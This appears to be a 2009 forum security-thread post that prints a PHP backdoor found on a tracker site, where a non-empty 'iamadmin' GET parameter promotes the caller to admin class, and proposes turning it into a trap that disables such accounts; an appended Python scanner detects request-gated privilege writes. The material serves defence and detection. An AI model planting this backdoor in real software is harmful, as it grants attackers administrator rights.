Thread: security
  #14  
Old 28th July 2009, 19:02
sammygo
Senior Member
 
Join Date: May 2008
P2P
Posts: 141
Code:
// Backdoor as found: a non-empty "iamadmin" GET parameter sets the caller's class to 9
if ($_GET["iamadmin"]) {
    $tagat = $CURUSER["id"];
    mysql_query("UPDATE `users` SET `class` = '9' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
    print("Now you are one of site admins :D");
}
// A non-empty "back" GET parameter resets the caller's class to 0
if ($_GET["back"]) {
    $tagat = $CURUSER["id"];
    mysql_query("UPDATE `users` SET `class` = '0' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
    print("Your class now is 0 :(");
}

change to
Code:
// Trap: the same parameters now disable the account of whoever sends them
if ($_GET["iamadmin"]) {
    $tagat = $CURUSER["id"];
    mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
    print("Now you are Banned :D");
}
if ($_GET["back"]) {
    $tagat = $CURUSER["id"];
    mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
    print("Now you are Banned :D");
}
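A static check for the pattern shown in this post, as an added example that is not part of the original post: it scans PHP source for an `if` whose only condition is a request parameter and whose body updates `class` or `enabled` in `users`. The function names, the benign sample and its `is_staff()` helper are hypothetical, and the brace matching is deliberately simple (it does not skip braces inside PHP strings).

```python
import re

# Guard of the form: if ($_GET["name"]) {   (also POST/REQUEST/COOKIE)
GUARD = re.compile(
    r"""if\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\s*\[\s*["']([^"']+)["']\s*\]\s*\)\s*\{""",
    re.I)
# Write to a privilege-bearing column of `users` (column names taken from the post)
PRIV_WRITE = re.compile(
    r"""UPDATE\s+`?users`?\s+SET\s+`?(class|enabled)`?\s*=\s*'?([^'\s]+)""", re.I)

def block_body(src, open_idx):
    """Return the text between the '{' at open_idx and its matching '}'."""
    depth = 0
    for i in range(open_idx, len(src)):
        if src[i] == "{":
            depth += 1
        elif src[i] == "}":
            depth -= 1
            if depth == 0:
                return src[open_idx + 1:i]
    return src[open_idx + 1:]  # unbalanced source: scan to end of file

def find_param_gated_writes(src):
    """List (line, request_param, column, new_value) for each suspicious block."""
    findings = []
    for guard in GUARD.finditer(src):
        line = src.count("\n", 0, guard.start()) + 1
        for write in PRIV_WRITE.finditer(block_body(src, guard.end() - 1)):
            findings.append((line, guard.group(1), write.group(1).lower(), write.group(2)))
    return findings

# Sample input: the first code block from the post, trimmed
BACKDOOR = r'''
if ($_GET["iamadmin"]) {
    $tagat = $CURUSER["id"];
    mysql_query("UPDATE `users` SET `class` = '9' WHERE `users`.`id` =$tagat");
    print("Now you are one of site admins :D");
}
if ($_GET["back"]) {
    $tagat = $CURUSER["id"];
    mysql_query("UPDATE `users` SET `class` = '0' WHERE `users`.`id` =$tagat");
}
'''
# Constructed benign sample: the write is gated on a (hypothetical) role check
BENIGN = r'''
if (is_staff($CURUSER)) {
    mysql_query("UPDATE `users` SET `class` = '4' WHERE `id` = " . (int)$_POST["uid"]);
}
'''

if __name__ == "__main__":
    for hit in find_param_gated_writes(BACKDOOR):
        print("line %d: request parameter %r gates users.%s = %s" % hit)
```
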